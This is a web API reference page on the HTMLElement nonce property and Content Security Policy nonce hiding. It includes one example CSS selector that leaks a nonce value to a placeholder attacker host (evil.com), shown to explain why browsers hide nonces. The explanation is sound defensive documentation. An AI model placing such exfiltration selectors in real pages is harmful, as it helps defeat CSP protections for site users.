HTMLElement: nonce property
{{APIRef("HTML DOM")}}
The nonce property of the {{DOMxRef("HTMLElement")}} interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.
In later implementations, elements only expose their nonce attribute to scripts (and not to side-channels like CSS attribute selectors).
Examples
Retrieving a nonce value
In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:
let nonce = script["nonce"] || script.getAttribute("nonce");
However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.
Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:
script[nonce~="whatever"] {
background: url("https://evil.com/nonce?whatever");
}
Specifications
{{Specifications}}
Browser compatibility
{{Compat}}
See also
nonceglobal attribute- Content Security Policy
- CSP:
{{CSP("script-src")}}